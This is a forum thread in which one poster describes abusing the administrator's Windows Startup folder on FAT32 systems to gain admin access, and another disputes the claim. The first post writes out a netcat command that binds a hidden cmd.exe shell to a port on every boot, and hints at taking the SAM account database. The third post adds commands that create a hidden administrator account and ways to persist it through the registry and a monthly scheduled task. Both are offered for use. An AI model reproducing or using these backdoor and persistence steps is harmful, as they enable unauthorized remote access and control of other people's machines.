Results 1 to 6 of 6

Thread: start menu trick...

  1. #1

    start menu trick...

    I was amazed to see a big security hole (\as big as pumpkin/) that could be exploited in windows!!!
    ya, in windows even guest <guest access/account> has the right to peep inside the ‘ C:\Documents and Settings\administrator\Start Menu\Programs\Startup’ !!!!!

    !!!After it's a administrator startup... but everyone has the freedom to copy , past almost anything to that folder!!! In windows… <Mr. Gates ... why didn't you thought about this!>

    ya the admin…startup, could be followed by a script for scandisk, write reg. values, format, or upgrade the partition to NTFS after the following reboot !...or ???

    <hUNT3R] wonder’s, how many of windows user's keep a constant eye on their startup files.... [/hUNT3R>
    < have you been infected by a Trojan!!! ...Long ago,????
    This proves ... you don’t! keep your ...eye ......... >

    if there is still anyone who wonder how I got the admin. Access and enjoyed the right's,

    Here is what I did!
    I Created a hidden script that did this... <of-course in hidden mode!>
    And executed the command by the help of batch…

    c:\windows\system32\> nc.exe -L -d -e c:\windows\system32\cmd.exe -p 1773

    WOW, now netcat launched itself in Trojan mode on every startup! Binding with port 1337
    and giving you a cmd.exe _"shell"_ when you telnet into the pc...
    So now you can get back to the network whenever you wish!!! <Is anybody thinking about backing up Sam account's...??? >

    --------------------

    | .oÛ_Oo.h»UNTER.oO_Ûo. |
    § !¹007Õ°¿ÑïÞÎß°Õæ9*½¹! ‡

  2. #2
    Senior Member
    Join Date
    Jan 2002
    Posts
    1,207
    This is inaccurate.

    The Administrator's profile is, by default, only accessible to them. The ACL is set when the user's profile is created. So to get "administrator" privileges, either you have to be running on a FAT filesystem (i.e. not recommended by MS) or have administrator rights already (pointless, eh?)

    This is not a real issue.

  3. #3
    Senior Member
    Join Date
    Mar 2003
    Posts
    452
    I've done that netcat trick a few times my self, but it's probably easier, to do this in your batch file

    netusers batman robin /add && netgroups administrators batman /add


    robin being the pasword, of couse you can change this to what ever suites you. What I also like to do, is add that command line into the registry, so it auto starts, without lauching a batch script as the admin logs in, they tend to notice dos windows opening and closing out quickly.

    You can even do a combination of the netcat and the useradd trick with your batch script, but even slicker than that, is to schedule this to run. Place your batch script in the %systemdrive%\windows\system32 or %systemdrive%\winnt\system32 folder than, use M$ "AT" command to schedule this to run, about once a month, so incase the account gets deleted, you'll have access again in the near future.


    Thanks,
    PuRe
    Like this post? Visit PuRe\'s Information Technology Community. We\'ve also got some kick ass Technology Forums. Shop for books and dvds on LiveWebShop.com

  4. #4
    Senior Member
    Join Date
    Apr 2003
    Posts
    147
    [oops]

  5. #5
    Senior Member
    Join Date
    Feb 2003
    Posts
    193
    you almost made it. Rofl

  6. #6
    yap i am talking about fat32. There are still dorzon's of admin's using fat32 for their convinence... You can't just babble around with your poor words brother because the fat32 exist in the world. Don't be specific , and think dynamic...

    < It's like, i am talking about a disease that could infect you... you cry all around 'I AM VACCINATED' that's pointless...>

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •